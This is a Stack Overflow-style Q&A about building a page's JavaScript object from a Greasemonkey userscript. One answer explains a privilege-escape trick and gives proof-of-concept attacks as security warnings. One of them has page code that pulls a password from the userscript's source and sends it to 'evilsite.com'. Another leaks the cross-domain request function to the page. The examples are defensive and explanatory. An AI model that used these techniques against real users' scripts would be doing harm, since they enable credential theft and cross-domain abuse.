# How do I use constructor of a remote Page to create an Object in my Greasemonkey UserScript?

Tags: javascript, greasemonkey, scriptmanager

The page on which my userscript will run has a namespace, the namespace defines a constructor function. I would like to create an object using the same constructor and use methods of the object in my userscript. So far I have been unsuccessful. Here's what I am trying to do.

The Page has the following native javascript block :

```
var namespace={ constructor : function(){
   this.sum = function(value1,value2){
   alert(value1+value2);
    }
  }
}
```

being used like:

```
var pageObject=new namespace.constructor();
pageObject.sum(1,2);
```

In My Userscript its my intention to create an object just like pageObject and call sum from that with my own parameters.

I have tried doing the following :

```
var greaseNameSpace = unsafeWindow.namespace;
var greaseObject = new greaseNameSpace.constructor();
greaseObject.sum(1,2);
```

No Luck, appears though greaseNameSpace exist, and even greaseNameSpace.constructor is a valid function , using new greaseNameSpace.constructor() yields undefined.

also tried following :

```
var greaseObject =new unsafeWindow.namespace.constructor();
```

again greaseObject remains undefined.

I found one thread here [How can I create an object of a class which is defined in the remote page?](https://stackoverflow.com/questions/535959/greasemonkey-how-can-i-create-an-object-of-a-class-which-defined-in-the-remote-p)

But it uses eval, and I wonder if that's the right way ?

Any and all help would be much appreciated :) thanks!!

Comment: The eval approach is perfectly fine, if it works.  It just creates a copy in GM's sandbox.   Your script may be failing to see the JS namespace, etcetera, because it is in an iframe.  Is it?

Comment: No, the script is not inside an iframe . Its available in form of a js file.    var greaseNameSpace = unsafeWindow.namespace; and then doing a    unsafeWindow.console.log(greaseNameSpace) shows the Namespace Object just fine. Even doing a unsafeWindow.console.log(unsafeWindow.namespace.constructor) shows that its a function . But doing new of the constructor function gets me an undefined! I haven't yet tried the eval method, will do that and come back and report.

Comment: When I do this, I have no trouble using that namespace -- *unless* it is wrapped in an iframe.  Something is missing from the question.   Link to the target page or pare it down to a minimal -- but complete -- set of code (html, js, GM) that demonstrates the problem.

Comment: Ths js is generated by ScriptManager. It has the namespace containing the proxy classes using which I can make wcf/ajax calls from the UI. I will put a sample here soon. I hosted a simple site on IIS with relevant js having namespace and then tried making object in my userscript using --> new unsafeWindow.namespace.constructor() . Did not work. the Eval worked.

Comment: @miniGweek - what browser are you using?

Comment: @lwburk , using Firefox 3.6. , @ all , been away for a bit , but looks like I can spend some more time investigating this. Any help wud be appreciated.

Answer (score 1):

I have found a method to solve the question. Be careful to use this method though: when you partially/wrongly implement this code, you're opening a potential security hole.

The code below obtains a `window` object without the ambiguous restrictions of `unsafeWindow`. Any code executed in the scope of this `window` object will behave if it was a part of the actual page, similarly to the Content Scripts at Google Chrome's extensions.

### Code

```
// ==UserScript==
// @name           http://stackoverflow.com/q/4804765
// @namespace      Rob W
// @include        file:///tmp/test.html*
// ==/UserScript==

//Get a window object which is less restricted than unsafeWindow
var $_WINDOW = new XPCNativeWrapper(window, "")
                  .getInterface(Components.interfaces.nsIDOMWindow);

//Create an anonymous function wrapper for security
(function(){
    var obj = new $_WINDOW.namespace.constructor;
    obj.sum(4,5);

}).call($_WINDOW)
```

### Security considerations

- Wrap the code which uses methods/variables of this `window` object in a function, so that no dangerous holes are created. Do not allow this function wrapper to execute random code based on user input.
- See *Example 3* for the right method to implement `$_WINDOW`

### Examples / Proof of Concept

Below, I will show possible cases in which the `$_WINDOW` object is implemented in a dangerous way. It's obvious that the Code at the "`//page`" was not expected by the developer of the GM script.
Note: Some examples (such as example 2) may be useful for secure (local) web-based applications (at the `file:///` protocol, for instance).
Example 3 shows the right method to use `$_WINDOW`.

I have used the magic `__defineGetter__` function to detect calls to a variable, because most script developers do not know about this feature. Calling functions directly will also trigger the harmful code;

The main cause is laid at `arguments.callee.caller`. Inside a function, this object will refer to the function which has called the current function. When `unsafeWindow` is used, the `arguments.callee.caller` variable cannot be called. The function will then be displayed as `function SJOWContentBoundary{ [native code]}`. However, when `$_WINDOW` is used, the real GM function is visible and callable by the remote page.

**Example 1**: 
Reading (sensible) data from a GreaseMonkey script

```
//GreaseMonkey:
var password = "password";
alert($_WINDOW.namespace.Var); //Seemingly harmless?

//Page:
var namespace = {Var:1};
namespace.__defineGetter__("Var", function(){
    var gm_function = arguments.callee.caller;
    var password = gm_function.toString().match(/var password = "(.*?)";\n/);
    (new Image).src = "http://evilsite.com/stealpassword.php?p=" + password[0];
})
```

**Example 2**: 
Leaking a cross-domain `XMLHttpRequest` method to an arbitrary page.
The creator of this GM script intended to modify the page according to a hash change. However, by including a check (whether the page should be affected) in a function which changes the URL / callback, a hole was created.

```
//GreaseMonkey:
var base_url, callback;
function checkExistent(url, func){
    base_url = url;
    callback = func;
    return typeof $_WINDOW.some_var != "undefined"; //<---Leaked!
}
var isExistent = checkExistent("http://example.com/load?h=", function(res){
    alert(res.responseText);
});
var lastHash = unsafeWindow.location.hash.substr(1);
if(confirm(isExistent)){
    window.setInterval(function(){ //Create poller to detect hash changes
        var newHash = unsafeWindow.location.hash.substr(1);
        if(lastHash != newHash){
            GM_xmlhttpRequest({method:"GET",
                          "url": base_url + newHash, onload:callback});
            lastHash = newHash;
        }
    }, 300);
}

//Page
var step = 0, xhr;
window.__defineGetter__("some_var", function(){
    if(!step++){ //Define the xhr first time
        xhr = function(url, callback){
            arguments.callee.caller(url, callback);
              // = function checkExistent(url, callback) !!!!
            location.hash += "."; //Edit hash to trigger XHR
        }
    }
    return step;
});
```

**Example 3**: 
**Correct usage**
Variable getters should be defined such that no arbitrary requests can be made. Functions should not accept variables. If it's still necessary, wrap the getter in an anonymous function.

```
//GM:
function getUserdata(){
    //Get a string from a page. Wrap the string in a new String object,
    // to make sure that no evil properties/methods are defined
    return String($_WINDOW.variable);
}

//Method 2
//The developer of the GM script has to define a correct wrapper for type:
// String, Number, Boolean, ...
function getRandomVariable(type, name){
    var variable = (function(){ //No arguments, no hazards
        return $_WINDOW[name];
    })();
    return type(variable);
}
getRandomVariable(String, "variable");

//Page:
var variable = "There's no way to abuse this GM bridge.";
```

Comment: I will have to come back and check this. Have been away from GreaseMonkey world for sometime. This looks interesting.

Comment: I think that the method does not work any more. If I recall correctly, either Greasemonkey or Firefox changed fixed the hole at some point. I've just tested Example 1, and it does not work any more. I'll not delete the answer yet, in case you find something useful. If not, I will immediately delete it. So, if you discover that the answer is useless, please comment, so that I can delete the answer,

Answer (score 0):

Try:

```
var greaseNameSpace = unsafeWindow.namespace.constructor;
var greaseObject = new greaseNameSpace();
greaseObject.sum(1,2);
```